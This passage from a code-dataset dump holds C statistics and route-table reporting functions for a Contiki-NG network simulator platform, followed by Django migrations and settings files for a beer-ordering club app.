(float)appstat.totalpktrecvd/(float)appstat.totalpktsent);\n }\n ADD2BUF(NULL, \"\\t\\\"Least E2E Latency\\\": \\\"%lu\\\",\\n\", appstat.minroudtriptime);\n ADD2BUF(NULL, \"\\t\\\"MAX E2E Latency\\\": \\\"%lu\\\",\\n\", appstat.maxroundtriptime);\n }\n return n;\n#endif\n}\n\n\nint uip_ipaddr_to_str(const uip_ipaddr_t *addr, char *buf, int buflen)\n{\n#if NETSTACK_CONF_WITH_IPV6\n\tuint16_t a;\n\tunsigned int i;\n\tint f, n =0;\n#endif /* NETSTACK_CONF_WITH_IPV6 */\n\tif(addr == NULL) {\n\t\treturn snprintf(buf, buflen, \"[NONE]\");\n\t}\n#if NETSTACK_CONF_WITH_IPV6\n\tfor(i = 0, f = 0; i < sizeof(uip_ipaddr_t); i += 2) {\n\t\ta = (addr->u8[i] << 8) + addr->u8[i + 1];\n\t\tif(a == 0 && f >= 0) {\n\t\t\tif(f++ == 0) {\n\t\t\t\tn += snprintf(buf+n, buflen-n, \"::\");\n\t\t\t}\n\t\t} else {\n\t\t\tif(f > 0) {\n\t\t\t\tf = -1;\n\t\t\t} else if(i > 0) {\n\t\t\t\tn += snprintf(buf+n, buflen-n, \":\");\n\t\t\t}\n\t\t\tn += snprintf(buf+n, buflen-n,\"%x\", a);\n\t\t}\n\t}\n\treturn n;\n#else /* NETSTACK_CONF_WITH_IPV6 */\n\treturn snprintf(buf, buflen, \"%u.%u.%u.%u\",\n\t\t\taddr->u8[0], addr->u8[1], addr->u8[2], addr->u8[3]);\n#endif /* NETSTACK_CONF_WITH_IPV6 */\n}\n\nint cmd_def_route(uint16_t id, char *buf, int buflen)\n{\n const uip_ipaddr_t *ipaddr = uip_ds6_defrt_choose();\n if (!ipaddr) {\n return snprintf(buf, buflen, \"NO_DEF_ROUTE\");\n }\n\treturn 
uip_ipaddr_to_str(ipaddr, buf, buflen);\n}\n\nint cmd_rpl_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\t//LOCK();\n\tADD2BUF(NULL, \"{ \\\"rpl_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"mem_ovrflw\\\": \\\"%d\\\",\\n\", rpl_stats.mem_overflows);\n\tADD2BUF(NULL, \"\\t\\\"local_repairs\\\": \\\"%d\\\",\\n\", rpl_stats.local_repairs);\n\tADD2BUF(NULL, \"\\t\\\"global_repairs\\\": \\\"%d\\\",\\n\", rpl_stats.global_repairs);\n\tADD2BUF(NULL, \"\\t\\\"malformed_msgs\\\": \\\"%d\\\",\\n\", rpl_stats.malformed_msgs);\n\tADD2BUF(NULL, \"\\t\\\"resets\\\": \\\"%d\\\",\\n\", rpl_stats.resets);\n\tADD2BUF(NULL, \"\\t\\\"parent_switch\\\": \\\"%d\\\",\\n\", rpl_stats.parent_switch);\n\tADD2BUF(NULL, \"\\t\\\"fwd_errors\\\": \\\"%d\\\",\\n\", rpl_stats.forward_errors);\n\tADD2BUF(NULL, \"\\t\\\"loop_errors\\\": \\\"%d\\\",\\n\", rpl_stats.loop_errors);\n\tADD2BUF(NULL, \"\\t\\\"loop_warns\\\": \\\"%d\\\",\\n\", rpl_stats.loop_warnings);\n\tADD2BUF(NULL, \"\\t\\\"root_repairs\\\": \\\"%d\\\",\\n\", rpl_stats.root_repairs);\n\tADD2BUF(NULL, \"\\t\\\"dio_sent_mcast\\\": \\\"%d\\\",\\n\", rpl_stats.dio_sent_m);\n\tADD2BUF(NULL, \"\\t\\\"dio_sent_ucast\\\": \\\"%d\\\",\\n\", rpl_stats.dio_sent_u);\n\tADD2BUF(NULL, \"\\t\\\"dio_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.dio_recvd);\n\tADD2BUF(NULL, \"\\t\\\"dao_sent\\\": \\\"%d\\\",\\n\", rpl_stats.dao_sent);\n\tADD2BUF(NULL, \"\\t\\\"dao_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.dao_recvd);\n\tADD2BUF(NULL, \"\\t\\\"dao_fwded\\\": \\\"%d\\\",\\n\", rpl_stats.dao_forwarded);\n\tADD2BUF(NULL, \"\\t\\\"npdao_sent\\\": \\\"%d\\\",\\n\", rpl_stats.npdao_sent);\n\tADD2BUF(NULL, \"\\t\\\"npdao_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.npdao_recvd);\n\tADD2BUF(NULL, \"\\t\\\"npdao_fwded\\\": \\\"%d\\\",\\n\", rpl_stats.npdao_forwarded);\n\tADD2BUF(NULL, \"\\t\\\"dco_sent\\\": \\\"%d\\\",\\n\", rpl_stats.dco_sent);\n\tADD2BUF(NULL, \"\\t\\\"dco_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.dco_recvd);\n\tADD2BUF(NULL, \"\\t\\\"dco_fwded\\\": \\\"%d\\\",\\n\", rpl_stats.dco_forwarded);\n\tADD2BUF(NULL, \"\\t\\\"dco_ign\\\": \\\"%d\\\"\\n\", rpl_stats.dco_ignored);\n\tADD2BUF(NULL, \"}\\n}\");\n#if 0\n\tn = snprintf(buf, buflen, \"mem_ovrflw=%d,loc_rep=%d,glo_rep=%d,\"\n\t\t\t\"malformed_msgs=%d,resets=%d,prnt_sw=%d,\"\n\t\t\t\"fwd_err=%d,loop_err=%d,loop_warn=%d,root_rep=%d\",\n\t\t\trpl_stats.mem_overflows, rpl_stats.local_repairs, rpl_stats.global_repairs,\n\t\t\trpl_stats.malformed_msgs, rpl_stats.resets, rpl_stats.parent_switch,\n\t\t\trpl_stats.forward_errors, rpl_stats.loop_errors, rpl_stats.loop_warnings, rpl_stats.root_repairs);\n#endif\n\t//UNLOCK();\n\treturn n;\n#endif\n}\n\nint cmd_node_osname(uint16_t id, char *buf, int buflen)\n{\n\tint n=0;\n\tADD2BUF(NULL, \"{\\\"os\\\": \\\"contiki-ng\\\"}\");\n\treturn n;\n}\n\nint cmd_ipv6_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\t//LOCK();\n\tADD2BUF(NULL, \"{ \\\"ipv6_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.ip.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.ip.sent);\n\tADD2BUF(NULL, \"\\t\\\"fwded\\\": \\\"%d\\\",\\n\", uip_stat.ip.forwarded);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.ip.drop);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.ip.drop);\n\tADD2BUF(NULL, \"\\t\\\"ver_len_err\\\": \\\"%d\\\",\\n\",\n\t\tuip_stat.ip.vhlerr + uip_stat.ip.hblenerr + uip_stat.ip.lblenerr);\n\tADD2BUF(NULL, \"\\t\\\"fragerr\\\": \\\"%d\\\",\\n\", 
uip_stat.ip.fragerr);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\",\\n\", uip_stat.ip.chkerr);\n\tADD2BUF(NULL, \"\\t\\\"protoerr\\\": \\\"%d\\\"\\n\", uip_stat.ip.protoerr);\n\tADD2BUF(NULL, \"}\\n}\");\n#if 0\n\tn = snprintf(buf, buflen, \"ipv6 rcv=%d,sent=%d,fwded=%d,drop=%d,\"\n\t\t\t\"ver_len_err=%d,\"\n\t\t\t\"fragerr=%d,chkerr=%d,protoerr=%d\",\n\t\t\tuip_stat.ip.recv, uip_stat.ip.sent, uip_stat.ip.forwarded, uip_stat.ip.drop,\n\t\t\t(uip_stat.ip.vhlerr + uip_stat.ip.hblenerr + uip_stat.ip.lblenerr),\n\t\t\tuip_stat.ip.fragerr, uip_stat.ip.chkerr, uip_stat.ip.protoerr);\n\t//UNLOCK();\n#endif\n\treturn n;\n#endif\n}\n\nint cmd_icmp_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"icmp_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.icmp.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.icmp.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.icmp.drop);\n\tADD2BUF(NULL, \"\\t\\\"typeerr\\\": \\\"%d\\\",\\n\", uip_stat.icmp.typeerr);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\"\\n\", uip_stat.icmp.chkerr);\n\tADD2BUF(NULL, \"}\\n}\");\n#if 0\n\tn = snprintf(buf, buflen, \"icmpv6 rcv=%d,sent=%d,drop=%d,typeerr=%d,chkerr=%d\",\n\t\t\tuip_stat.icmp.recv, uip_stat.icmp.sent, uip_stat.icmp.drop,\n\t\t\tuip_stat.icmp.typeerr, uip_stat.icmp.chkerr);\n#endif\n\treturn n;\n#endif\n}\n\nint cmd_udp_stats(uint16_t id, char *buf, int buflen)\n{\n#if 0//UIP_CONF_UDP\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"udp_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.udp.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.udp.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.udp.drop);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\"\\n\", uip_stat.udp.chkerr);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n#else\n\treturn snprintf(buf, buflen, \"UDP_NOT_ENABLED\");\n#endif\n}\n\nint cmd_tcp_stats(uint16_t id, char *buf, int buflen)\n{\n#if 0//UIP_CONF_TCP\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"tcp_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.tcp.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.tcp.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.tcp.drop);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\",\\n\", uip_stat.tcp.chkerr);\n\tADD2BUF(NULL, \"\\t\\\"ackerr\\\": \\\"%d\\\",\\n\", uip_stat.tcp.ackerr);\n\tADD2BUF(NULL, \"\\t\\\"rst\\\": \\\"%d\\\",\\n\", uip_stat.tcp.rst);\n\tADD2BUF(NULL, \"\\t\\\"rexmit\\\": \\\"%d\\\",\\n\", uip_stat.tcp.rexmit);\n\tADD2BUF(NULL, \"\\t\\\"syndrop\\\": \\\"%d\\\",\\n\", uip_stat.tcp.syndrop);\n\tADD2BUF(NULL, \"\\t\\\"synrst\\\": \\\"%d\\\"\\n\", uip_stat.tcp.synrst);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n#else\n\treturn snprintf(buf, buflen, \"TCP_NOT_ENABLED\");\n#endif\n}\n\nint cmd_nd6_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"nd6_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.nd6.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.nd6.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\"\\n\", uip_stat.nd6.drop);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n#endif\n}\n\nint cmd_config_info(uint16_t id, char *buf, int buflen)\n{\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"config\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rttable_maxsz\\\": \\\"%d\\\",\\n\", 
UIP_DS6_ROUTE_NB);\n\tADD2BUF(NULL, \"\\t\\\"nbrtable_maxsz\\\": \\\"%d\\\"\\n\", NBR_TABLE_MAX_NEIGHBORS);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n}\n\nint cmd_route_table(uint16_t id, char *buf, int buflen)\n{\n int n=0;\n FILE *fp=NULL;\n\n if(buf && buf[0]) {\n fp = fopen(buf, \"wt\");\n if(!fp) {\n ADD2BUF(fp, \"cmd_route_table: COULD NOT WRITE TO FILE:<%s>\\n\", buf);\n ERROR(\"cmd_route_table: COULD NOT WRITE TO FILE:<%s>\\n\", buf);\n return n;\n }\n }\n //LOCK();\n ADD2BUF(fp, \"{ \\\"route_table\\\": {\\n\");\n ADD2BUF(fp, \"\\t\\\"routes\\\": [\\n\");\n n += get_route_list(fp, buf+n, buflen-n);\n ADD2BUF(fp, \"]\\n}}\");\n //UNLOCK();\n if(fp) {\n fclose(fp);\n ADD2BUF(NULL, \"SUCCESS\");\n }\n return n;\n}\n\n"
},
{
"alpha_fraction": 0.6306954622268677,
"alphanum_fraction": 0.6414868235588074,
"avg_line_length": 20.384614944458008,
"blob_id": "da6c4deeb70c0174586201b3913a5d449bb77bff",
"content_id": "63d537d939ff7946fc3beee436eef792ea361ddc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 834,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 39,
"path": "/arch/platform/whitefield/command.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef\t_COMMAND_H_\n#define\t_COMMAND_H_\n\n#include <stdio.h>\n#include <string.h>\n\n#include \"contiki.h\"\n#include \"net/packetbuf.h\"\n#include \"net/netstack.h\"\n#include \"os/net/routing/rpl-classic/rpl-private.h\"\n#include \"os/net/ipv6/uip.h\"\n#include \"os/net/link-stats.h\"\n\n#include \"net/ipv6/uip-ds6-route.h\"\n\n#include \"net/ipv6/uip-sr.h\"\n\n#define INFO printf\n#define ERROR printf\n\n#define ADD2BUF(FP, ...) \\\n{\\\n FILE *mylocfp = (FP);\\\n if(mylocfp) {\\\n fprintf(mylocfp, __VA_ARGS__);\\\n } else {\\\n n += snprintf(buf+n, buflen-n, __VA_ARGS__); \\\n }\\\n}\n\nint uip_ipaddr_to_str(const uip_ipaddr_t *addr, char *buf, int buflen);\n\nint cmd_def_route(uint16_t id, char *buf, int buflen);\n\nint cmd_rtsize(uint16_t id, char *buf, int buflen);\n\nint get_route_list(FILE *fp, char *buf, int buflen);\n\n#endif //_COMMAND_H_\n"
}
] | 20 |
amatt13/Feer-Club | https://github.com/amatt13/Feer-Club | 6b4b6afa4188aa67c4853ac1b80ce3e2fedf3cf8 | 5165501b21752db3796148c305cec5416783a8c7 | c6716c2186d99d36fd5006bc06e236236ea30817 | refs/heads/master | 2021-01-13T14:36:39.584534 | 2016-05-02T12:31:13 | 2016-05-02T12:31:13 | 72,865,708 | 0 | 0 | Apache-2.0 | 2016-11-04T16:31:34 | 2016-11-04T16:31:36 | 2022-07-04T07:16:25 | Python | [
{
"alpha_fraction": 0.5134255290031433,
"alphanum_fraction": 0.5809601545333862,
"avg_line_length": 36.81538391113281,
"blob_id": "2622992fe6d88bbd67e9b3aa243af27d85cd9f8f",
"content_id": "c54bb7d93152cab2210616e8b92642f56c8748ed",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2458,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 65,
"path": "/feer_club/feer/migrations/0018_auto_20160402_1503.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-04-02 13:03\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0017_auto_20160402_1229'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='beer',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 2, 31, 578232, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='beer',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 2, 42, 186093, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='order',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 3, 14, 39186, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='order',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 3, 16, 30779, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='orderitem',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 3, 17, 232609, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='orderitem',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 3, 18, 336149, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='rating',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 3, 19, 415807, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='rating',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 3, 20, 447692, tzinfo=utc)),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5220588445663452,
"alphanum_fraction": 0.6004902124404907,
"avg_line_length": 20.473684310913086,
"blob_id": "f94c8573bb08f1ec0fa7c572488f94f00bf95641",
"content_id": "9bb8ebb4b9b81cd5440c58a4435ba702bb38bfd8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 408,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 19,
"path": "/feer_club/feer/migrations/0016_remove_orderitem_volume_per_participant.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-27 15:39\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0015_auto_20160206_2305'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='orderitem',\n name='volume_per_participant',\n ),\n ]\n"
},
{
"alpha_fraction": 0.5656028389930725,
"alphanum_fraction": 0.6223404407501221,
"avg_line_length": 24.636363983154297,
"blob_id": "a2403ba649259f2f6ea767f4765fd10517137828",
"content_id": "897d9071f30bee7eb72341ff6ef20d56c20ca885",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 564,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 22,
"path": "/feer_club/feer/migrations/0007_orderitem_drink_date.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-16 20:50\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0006_auto_20160116_2137'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='orderitem',\n name='drink_date',\n field=models.DateField(default=django.utils.timezone.now, verbose_name='drink date'),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.7179487347602844,
"avg_line_length": 18.5,
"blob_id": "7109e75e6777efa7fb6358fbcc21da5f55a026d2",
"content_id": "c6de9f09552f95f360246581ad062cfca6f672ea",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 39,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "Django==1.9.1\ndjango-bootstrap3==6.2.2\n"
},
{
"alpha_fraction": 0.5114678740501404,
"alphanum_fraction": 0.5848624110221863,
"avg_line_length": 20.799999237060547,
"blob_id": "4cb3ac88a3360509069d90f68a32a877fbaaa81a",
"content_id": "32dd6a944cae3fcf26bd6b188dc93fc77c86389c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0013_auto_20160206_1855.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 17:55\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0012_auto_20160206_1329'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='rating',\n name='index',\n field=models.IntegerField(),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5872092843055725,
"alphanum_fraction": 0.6162790656089783,
"avg_line_length": 25.461538314819336,
"blob_id": "b518c8c1aad93c5dc69c486f0c52213ba304c42d",
"content_id": "732d311a1e5df217c41687d3967e4b796c3265d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 26,
"path": "/feer_club/feer/migrations/0008_auto_20160120_1326.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-20 12:26\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('feer', '0007_orderitem_drink_date'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='orderitem',\n name='participants',\n ),\n migrations.AddField(\n model_name='orderitem',\n name='participants',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL),\n ),\n ]\n"
},
{
"alpha_fraction": 0.557986855506897,
"alphanum_fraction": 0.6017505526542664,
"avg_line_length": 21.850000381469727,
"blob_id": "a0c8942a1b9f8cb6f8e51b5a8f8176100be3660c",
"content_id": "0046cb105b8e19928481c0fcb9c4b653fba4cdad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 457,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0020_order_updatedable.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-05-01 13:46\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0019_order_remainding_balance'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='updatedable',\n field=models.BooleanField(default=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5492845773696899,
"alphanum_fraction": 0.5755167007446289,
"avg_line_length": 27.590909957885742,
"blob_id": "d9678eca602694c8bc33f0321618f1250b8d33b3",
"content_id": "9deb42a37ec0cbf37e899482f9aa8710ec8fad1c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1258,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 44,
"path": "/feer_club/feer/migrations/0012_auto_20160206_1329.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 12:29\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('feer', '0011_auto_20160206_1305'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='profile',\n name='reviews',\n ),\n migrations.RemoveField(\n model_name='profile',\n name='user',\n ),\n migrations.RemoveField(\n model_name='rating',\n name='profile',\n ),\n migrations.AddField(\n model_name='beer',\n name='ratings',\n field=models.ManyToManyField(through='feer.Rating', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='rating',\n name='user',\n field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),\n preserve_default=False,\n ),\n migrations.DeleteModel(\n name='Profile',\n ),\n ]\n"
},
{
"alpha_fraction": 0.698019802570343,
"alphanum_fraction": 0.698019802570343,
"avg_line_length": 29.076923370361328,
"blob_id": "0653791edd11a92c55ccbeb4f15e08c74ecaf7a1",
"content_id": "2843fda551d925d70c1f51ae75eb14da6422fdc2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 13,
"path": "/feer_club/feer_club/settings/prod.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import # optional, but I like it\r\nfrom .common import *\r\n\r\nwith open('/home/django/Feer-Club/secret_key.txt') as f:\r\n SECRET_KEY = f.read().strip()\r\nDEBUG = False\r\nALLOWED_HOSTS = ['*']\r\nSESSION_COOKIE_SECURE = True\r\nCSRF_COOKIE_SECURE = True\r\nCSRF_COOKIE_HTTPONLY = True\r\nX_FRAME_OPTIONS = 'DENY'\r\nSECURE_BROWSER_XSS_FILTER = True\r\nSECURE_CONTENT_TYPE_NOSNIFF = True\r\n"
},
{
"alpha_fraction": 0.664383590221405,
"alphanum_fraction": 0.664383590221405,
"avg_line_length": 22.33333396911621,
"blob_id": "3998f941065ab4e13ed60dcdce2f41bea52d4bff",
"content_id": "971af64de257e420f2a88bebdd937ec05654e235",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 6,
"path": "/feer_club/feer_club/settings/dev.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import # optional, but I like it\r\nfrom .common import *\r\n\r\nSECRET_KEY = '#+l0-i%us49hj6w663c_797d%hd2xq#@dioc__s&j947srp!p4'\r\nDEBUG = True\r\nALLOWED_HOSTS = []\r\n"
},
{
"alpha_fraction": 0.5303326845169067,
"alphanum_fraction": 0.5694715976715088,
"avg_line_length": 21.217391967773438,
"blob_id": "16becb1c1edad4c32a6d43b63aae73a2dcf349ac",
"content_id": "d584190de4bc7b71be099f0dbfc90ab676b0f68b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/feer_club/feer/migrations/0017_auto_20160402_1229.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-04-02 10:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0016_remove_orderitem_volume_per_participant'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='order',\n name='cost',\n ),\n migrations.RemoveField(\n model_name='orderitem',\n name='cost',\n ),\n ]\n"
},
{
"alpha_fraction": 0.533923327922821,
"alphanum_fraction": 0.5899705290794373,
"avg_line_length": 26.1200008392334,
"blob_id": "63af6835820a513244d88a60133f3771fcddeda2",
"content_id": "9b890c21f33f6c26b7ed58c79a7956dc3a1336e5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 678,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 25,
"path": "/feer_club/feer/migrations/0022_auto_20160501_1646.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-05-01 14:46\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0021_auto_20160501_1551'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='cost_for_free_shipping',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n ),\n migrations.AddField(\n model_name='order',\n name='shipping_fee',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6896551847457886,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 41.5,
"blob_id": "2ffa2d8d181920b32578a977eaf70fbfc6154942",
"content_id": "1638c660f3e01d239de65ace84697fe97c35ed5c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "permissive",
"max_line_length": 45,
